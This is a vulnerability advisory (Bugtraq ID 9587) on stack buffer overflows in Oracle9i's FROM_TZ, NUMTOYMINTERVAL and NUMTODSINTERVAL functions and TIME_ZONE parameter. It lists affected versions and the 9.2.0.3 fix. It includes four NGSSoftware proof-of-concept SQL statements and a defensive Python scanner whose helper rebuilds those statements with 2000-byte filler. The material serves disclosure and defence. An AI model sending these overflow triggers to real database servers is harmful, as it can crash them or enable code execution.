Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities
BID:9587
Info
| Bugtraq ID: | 9587 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 05 2004 12:00AM |
| Updated: | Feb 05 2004 12:00AM |
| Credit: | Discovery credited to NGSSoftware. |
| Vulnerable: |
- Oracle Oracle9i Standard Edition 9.2.0.2
- Oracle Oracle9i Standard Edition 9.2.0.1
- Oracle Oracle9i Standard Edition 9.2
- Oracle Oracle9i Standard Edition 9.0.2
- Oracle Oracle9i Standard Edition 9.0.1.4
- Oracle Oracle9i Standard Edition 9.0.1.3
- Oracle Oracle9i Standard Edition 9.0.1.2
- Oracle Oracle9i Standard Edition 9.0.1
- Oracle Oracle9i Standard Edition 9.0
- Oracle Oracle9i Personal Edition 9.2.0.2
- Oracle Oracle9i Personal Edition 9.2.0.1
- Oracle Oracle9i Personal Edition 9.2
- Oracle Oracle9i Personal Edition 9.0.1
- Oracle Oracle9i Enterprise Edition 9.2.2
- Oracle Oracle9i Enterprise Edition 9.2.0.1
- Oracle Oracle9i Enterprise Edition 9.2.0
- Oracle Oracle9i Enterprise Edition 9.0.1
| Not Vulnerable: |
- Oracle Oracle9i Standard Edition 9.2.0.3
- Oracle Oracle9i Personal Edition 9.2.0.3
- Oracle Oracle9i Enterprise Edition 9.2.0.3
Discussion
Oracle Database has been reported prone to multiple stack-based buffer overflow vulnerabilities in its handling of certain parameters and functions: the TIME_ZONE session parameter and the NUMTOYMINTERVAL, NUMTODSINTERVAL and FROM_TZ SQL functions. An overly long string passed to any of them may overrun a fixed-size buffer on the stack, corrupting adjacent memory and ultimately allowing arbitrary code execution within the database server process. Each of these sinks is reached through ordinary SQL, so an attacker needs some way to submit statements to the server (a database session of their own, or an application that forwards attacker-controlled SQL); the issues are remotely exploitable in that sense, but they are not reachable without a session.
Exploit / POC
The following proof-of-concepts have been made available by NGS Software. Each one passes an oversized string literal (the '<long string here>' placeholder) into one of the four affected sinks; the window-function examples use the EMPLOYEES and EMP tables from Oracle's standard sample schemas.

```sql
-- FROM_TZ: oversized time-zone argument
SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00', '<long string here>') FROM DUAL;

-- NUMTOYMINTERVAL: oversized interval-unit argument inside an analytic window clause
SELECT last_name, hire_date, salary,
       SUM(salary) OVER (ORDER BY hire_date RANGE NUMTOYMINTERVAL(1, '<long string here>') PRECEDING) AS t_sal
FROM employees;

-- NUMTODSINTERVAL: oversized interval-unit argument inside an analytic window clause
SELECT empno, ename, hiredate,
       COUNT(*) OVER (PARTITION BY empno ORDER BY hiredate RANGE NUMTODSINTERVAL(100, '<long string here>') PRECEDING) AS t_count
FROM emp;

-- TIME_ZONE session parameter: the overflow is triggered when the value is used
ALTER SESSION SET TIME_ZONE = '<long string here>';
SELECT CURRENT_TIMESTAMP, LOCALTIMESTAMP FROM DUAL;
```
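As an added example, not part of the advisory and not NGSSoftware's or Oracle's code, the following Python does what a defender would want from the proof-of-concepts above: it scans captured SQL text for the four sinks named in the advisory and flags string literals that are implausibly long, and it compares a V$VERSION banner line against the 9.2.0.3 fix level given in the Solution section. The 64-character threshold, the 2000-byte filler, the sample (banner, SQL) records and all function names are this example's own assumptions, not figures from the advisory.

```python
import re

# Fix level from the advisory's Solution section: Oracle9i Release 2, 9.2.0.3.
# Anything below it is treated as unpatched (the advisory lists no fixed 9.0.x).
FIXED_VERSION = (9, 2, 0, 3)

# Hypothetical tuning value, not a figure from the advisory: legitimate values for
# these sinks are short time-zone names ('US/Pacific', '+05:30') or interval
# units ('YEAR', 'DAY'), so a longer literal is worth a look.
MAX_SANE_LITERAL = 64

# The three functions and the session parameter named in the advisory.
_SINK_CALL_RE = re.compile(r"\b(FROM_TZ|NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)
_TIME_ZONE_RE = re.compile(r"\bALTER\s+SESSION\s+SET\s+TIME_ZONE\s*=\s*'((?:[^']|'')*)'", re.IGNORECASE)
_LITERAL_RE = re.compile(r"'((?:[^']|'')*)'")          # single-quoted literal, '' escapes a quote
_BANNER_RE = re.compile(r"Release\s+(\d+(?:\.\d+)+)")  # e.g. "... Release 9.2.0.2.0 - Production"


def poc_statements(filler_len):
    """The four NGSSoftware proof-of-concept statements with '<long string here>'
    replaced by filler_len 'A' characters, for testing a lab instance."""
    s = "A" * filler_len
    return [
        f"SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00', '{s}') FROM DUAL",
        f"SELECT last_name, hire_date, salary, SUM(salary) OVER (ORDER BY hire_date "
        f"RANGE NUMTOYMINTERVAL(1, '{s}') PRECEDING) AS t_sal FROM employees",
        f"SELECT empno, ename, hiredate, COUNT(*) OVER (PARTITION BY empno ORDER BY "
        f"hiredate RANGE NUMTODSINTERVAL(100, '{s}') PRECEDING) AS t_count FROM emp",
        f"ALTER SESSION SET TIME_ZONE = '{s}'; SELECT CURRENT_TIMESTAMP, LOCALTIMESTAMP FROM DUAL",
    ]


def _call_body(sql, open_paren):
    """Text between the '(' at open_paren and its matching ')', ignoring
    parentheses that sit inside single-quoted literals."""
    depth, in_str, i = 0, False, open_paren
    while i < len(sql):
        ch = sql[i]
        if in_str:
            if ch == "'":
                if i + 1 < len(sql) and sql[i + 1] == "'":
                    i += 1                      # doubled quote inside a literal
                else:
                    in_str = False
        elif ch == "'":
            in_str = True
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return sql[open_paren + 1:i]
        i += 1
    return sql[open_paren + 1:]                 # unterminated call: take the rest


def find_overlong_sinks(sql, limit=MAX_SANE_LITERAL):
    """Return [(sink_name, literal_length)] for every string literal longer than
    `limit` that is passed to one of the four sinks in a single SQL text."""
    hits = []
    for m in _SINK_CALL_RE.finditer(sql):
        body = _call_body(sql, m.end() - 1)
        for lit in _LITERAL_RE.findall(body):
            if len(lit) > limit:
                hits.append((m.group(1).upper(), len(lit)))
    for m in _TIME_ZONE_RE.finditer(sql):
        if len(m.group(1)) > limit:
            hits.append(("TIME_ZONE", len(m.group(1))))
    return hits


def version_is_fixed(banner):
    """Parse the release number out of a V$VERSION banner line and compare it
    with the 9.2.0.3 fix level (fifth and later components are ignored)."""
    m = _BANNER_RE.search(banner)
    if not m:
        raise ValueError(f"no release number in banner: {banner!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    return (parts + (0, 0, 0, 0))[:4] >= FIXED_VERSION


def triage(records, limit=MAX_SANE_LITERAL):
    """records: iterable of (banner, sql_text). Returns one finding per record
    that carries an overlong literal, tagged with whether the instance it ran
    against is still below the fix level."""
    findings = []
    for banner, sql in records:
        hits = find_overlong_sinks(sql, limit)
        if hits:
            findings.append({"sinks": hits, "unpatched": not version_is_fixed(banner),
                             "sql": sql[:50] + ("..." if len(sql) > 50 else "")})
    return findings


# Constructed sample (banner, SQL) pairs, not real audit data: two benign
# statements and the four proof-of-concepts with 2000-byte filler.
_BANNER_922 = "Oracle9i Enterprise Edition Release 9.2.0.2.0 - Production"
SAMPLE_RECORDS = [
    (_BANNER_922, "SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00', 'US/Pacific') FROM DUAL"),
    (_BANNER_922, "ALTER SESSION SET TIME_ZONE = 'Europe/London'"),
] + [(_BANNER_922, stmt) for stmt in poc_statements(2000)]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

Run as-is it triages the constructed records and reports the four proof-of-concept statements as overlong sinks on an unpatched 9.2.0.2 instance while leaving the two benign statements alone. In practice the SQL text would come from the audit trail or an application's statement log, and the banner from SELECT banner FROM v$version on the instance concerned. A long literal in these positions is a reason to look at the session, not proof of exploitation, and the threshold should be set from whatever legitimate values the application actually passes.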
Solution / Fix
Solution:
These issues are reportedly addressed in Oracle9i Database Release 2, version 9.2.0.3, the only release listed as not vulnerable above. This has not been confirmed by Symantec. The installed release can be read from the BANNER column of V$VERSION.
Oracle fixes are available to customers through the Metalink website. To obtain fixes visit:
http://metalink.oracle.com
References
References:
- Oracle FROM_TZ Remote System Buffer Overrun (NGSSoftware)
- Oracle NUMTODSINTERVAL Remote System Overflow (NGSSoftware)
- Oracle NUMTOYMINTERVAL Remote System Overflow (NGSSoftware)
- Oracle Support Metalink (Oracle)
- Oracle TIME_ZONE Remote System Buffer Overrun (NGSSoftware)